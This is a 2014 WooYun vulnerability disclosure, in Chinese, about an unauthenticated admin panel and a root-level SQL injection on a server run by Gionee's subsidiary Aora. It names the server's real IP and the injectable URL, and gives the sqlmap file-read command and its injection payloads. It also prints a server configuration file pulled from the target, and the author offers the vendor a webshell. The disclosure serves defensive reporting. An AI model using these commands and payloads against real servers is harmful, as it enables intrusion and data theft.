当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-080496

漏洞标题:金立旗下奥软公司某后台未授权访问加注入致getshell

相关厂商:gionee.com

漏洞作者: ljhj

提交时间:2014-10-23 18:44

修复时间:2014-10-28 18:46

公开时间:2014-10-28 18:46

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-23: 细节已通知厂商并且等待厂商处理中
2014-10-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

主要是未授权访问,而后找到注入一枚,权限极高,思路猥琐,不知道能不能加刀。

详细说明:

首先是通过搜索引擎大法找到后台:http://120.31.131.166:82/
发现是应用汇的后台,里面各种操作完全无权限限制,各种数据

数据展示.jpg


数据展示2.png


数据展示3.jpg


发现数据量还是蛮大的。
接着找到注入一枚:http://120.31.131.166:82/soft_series_cps.php?series_id=-1
权限:root

所有数据库.jpg


好多数据库,不过想来想去只能脱裤子,什么都做不了,上不了马。
这边卡住了。
接着去尝试读取文件,发现系统的权限也挺高,什么文件都能读取。
但是不知道项目的目录,没办法读取他的项目文件。
又卡住了。。。
忽然我头顶的灯泡闪了两下,他的服务器是nginx的。那我是不是可以读取nginx的配置文件呢,这样我就可以知道他的项目都放在哪里,就可以写文件了。
于是去读取nginx的配置,发现也不知道他的nginx配置在哪里,,,
不过nginx配置放在哪里应该跟系统有关系,服务器是linux系统,读取/etc/issue文件,是centos。
然后百度了一下,知道centos的nginx配置放在/usr/local/nginx/conf/nginx.conf
ok go!

root@kali:~# sqlmap -u "http://120.31.131.166:82/soft_series_cps.php?series_id=-1" --file-read /usr/local/nginx/conf/nginx.conf
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 15:55:18
[15:55:18] [INFO] resuming back-end DBMS 'mysql'
[15:55:18] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: series_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: series_id=-1 AND 1443=1443
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: series_id=-1 AND (SELECT 4836 FROM(SELECT COUNT(*),CONCAT(0x716a707871,(SELECT (CASE WHEN (4836=4836) THEN 1 ELSE 0 END)),0x7167687071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: series_id=-1 AND SLEEP(5)
---
[15:55:18] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.10, Nginx
back-end DBMS: MySQL 5.0
[15:55:18] [INFO] fingerprinting the back-end DBMS operating system
[15:55:18] [INFO] the back-end DBMS operating system is Linux
[15:55:18] [INFO] fetching file: '/usr/local/nginx/conf/nginx.conf'
[15:55:18] [WARNING] reflective value(s) found and filtering out
user nginx nginx;
worker_processes 5;
error_log logs/error.log info;
pid logs/nginx.pid;
worker_rlimit_nofile 65535;
events {
use epoll ;
worker_connections 65535;
}
http {
include mime.types;
default_type application/octet-stream;
sendfile on;
tcp_nopush on;
keepalive_timeout 300;
gzip on;
client_max_body_size 50m;
fastcgi_connect_timeout 300;
fastcgi_send_timeout 300;
fastcgi_read_timeout 300;
fastcgi_buffers 4 128k;
fastcgi_busy_buffers_size 256k;
fastcgi_temp_file_write_size 256k;
fastcgi_buffer_size 256k; #\xe5\xbf\x85\xe9\xa0\x88\xe6\x9c\x89\xe7\x9a\x84\xef\xbc\x8c\xe6\xb3\xa8\xe6\x84\x8f\xe4\xba\x86
server {
listen 80;
server_name aora37.myaora.net;
charset utf-8;
root /www/wwwmtk-tag/wap/wapadmin/wap;
index index.php index.html index.htm;
error_page 500 502 503 504 /50x.html;
location = /50x.html {
root html;
}

location ~ .*\\.php$ {
fastcgi_pass unix:/var/run/fastcgi/fastcgi.socket;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_intercept_errors on;
include fastcgi_params;
}
}
# added on 2011.03.17 anzhi
server {
listen 81;
server_name android.myaora.net;
charset utf-8;
root /web/wwwroot/gomarket.goapk.com;
index index.php index.html index.htm;
#error_page 500 502 503 504 /50x.html;
#error_page 404 403 /404.html;
location = /50x.html {
root html;
}
location ~ .*\\.php$ {
fastcgi_pass unix:/var/run/fastcgi/fastcgi.socket;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_intercept_errors on;
include fastcgi_params;
}
}
server {
listen 810;
server_name android.myaora.net;
charset utf-8;
root /web_test/wwwroot/gomarket.goapk.com;
index index.php index.html index.htm;
error_page 500 502 503 504 /50x.html;
#error_page 404 403 /404.html;
location = /50x.html {
root html;
}
location ~ .*\\.php$ {
fastcgi_pass unix:/var/run/fastcgi/fastcgi.socket;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_intercept_errors on;
include fastcgi_params;
}
}
server {
listen 8100;
server_name android.myaora.net;
charset utf-8;
root /gamecenter.com/gomarket.goapk.com/;
index index.php index.html index.htm;
error_page 500 502 503 504 /50x.html;
location = /50x.html {
root html;
}
location ~ .*\\.php$ {
fastcgi_pass unix:/var/run/fastcgi/fastcgi.socket;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_intercept_errors on;
include fastcgi_params;
}
}
server {
listen 8200;
server_name android.myaora.net;
charset utf-8;
root /gamecenter.com/admin.goapk.com/;
index index.php index.html index.htm;
error_page 500 502 503 504 /50x.html;
location = /50x.html {
root html;
}
location ~ .*\\.php$ {
fastcgi_pass unix:/var/run/fastcgi/fastcgi.socket;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_intercept_errors on;
include fastcgi_params;
}
}
server {
listen 1008;
server_name freego.myaora.net;
charset utf-8;
root /freego/wwwroot/admin.goapk.com/;
index index.php index.html index.htm;
error_page 500 502 503 504 /50x.html;
location = /50x.html {
root html;
}
location ~ .*\\.php$ {
fastcgi_pass unix:/var/run/fastcgi/fastcgi.socket;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_intercept_errors on;
include fastcgi_params;
}
}
server {
listen 820;
server_name android.myaora.net;
charset utf-8;
root /web_test/wwwroot/admin.goapk.com;
index index.php index.html index.htm;
error_page 500 502 503 504 /50x.html;
location = /50x.html {
root html;
}
location ~ .*\\.php$ {
fastcgi_pass unix:/var/run/fastcgi/fastcgi.socket;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_intercept_errors on;
include fastcgi_params;
}
}
server {
listen 1007;
server_name freego.myaora.net;
charset utf-8;
root /freego/wwwroot/gomarket.goapk.com;
index index.php index.html index.htm;
error_page 500 502 503 504 /50x.html;
location = /50x.html {
root html;
}
location ~ .*\\.php$ {
fastcgi_pass unix:/var/run/fastcgi/fastcgi.socket;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_intercept_errors on;
include fastcgi_params;
}
}
}
do you want confirmation that the remote file '/usr/local/nginx/conf/nginx.conf' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[15:55:44] [INFO] retrieved: 5803
[15:55:44] [INFO] the local file /usr/share/sqlmap/output/120.31.131.166/files/_usr_local_nginx_conf_nginx.conf and the remote file /usr/local/nginx/conf/nginx.conf have the same size
files saved to [1]:
[*] /usr/share/sqlmap/output/120.31.131.166/files/_usr_local_nginx_conf_nginx.conf (same file)
[15:55:44] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/120.31.131.166'
[*] shutting down at 15:55:44


哇,果然读出了nginx的配置。
看到了好多项目,但是具体不知道哪个项目。
又通过一遍遍的测试发现,我访问的后台放在/freego/wwwroot/admin.goapk.com/
至此,服务器能不能拿下已经显而易见了。只需要sqlmap传一个马到上面的路径下就可以了。
由于我是好学生,以及种种原因,我不想往上面放马。权限都有了,放马只差一个点击。如果非要放马才能证明严重性,请私信我,送大马一只,服务器shell。

漏洞证明:

由于前面有点迷茫,服务器各种翻,于是读出了许多文件,包括数据库的配置。

文件列表.jpg


先是找到了/freego/wwwroot/admin.goapk.com/下的index.php文件

index.php.jpg


顺着这个找到了checklogin.php

checklogin.php.jpg


接着又找到

stdafx.php.jpg


终于找到了数据库的配置

数据库配置.jpg


未脱裤,通过sqlmap读取的文件也都已删除。

修复方案:

增加权限限制

版权声明:转载请注明来源 ljhj@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-10-28 18:46

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

2014-10-28:已修补,非常感谢“路人甲”对我司作的安全贡献


漏洞评价:

评论

  1. 2014-10-24 12:44 | 掳人甲 ( 路人 | Rank:0 漏洞数:1 | .)

    www.aoratec.com么、、应该没刀刀

  2. 2014-10-28 21:26 | 滔哥 ( 路人 | Rank:0 漏洞数:2 | 平常心!)

    确定修补?

  3. 2014-10-28 21:51 | ljhj ( 路人 | Rank:29 漏洞数:7 | 专注弱口令30年,好品质值得信赖。)

    可以告知为什么修补了却不给rank么?@疯狗

  4. 2014-10-28 22:00 | ljhj ( 路人 | Rank:29 漏洞数:7 | 专注弱口令30年,好品质值得信赖。)

    而且也没修复,这是想把自己的服务器贡献出来?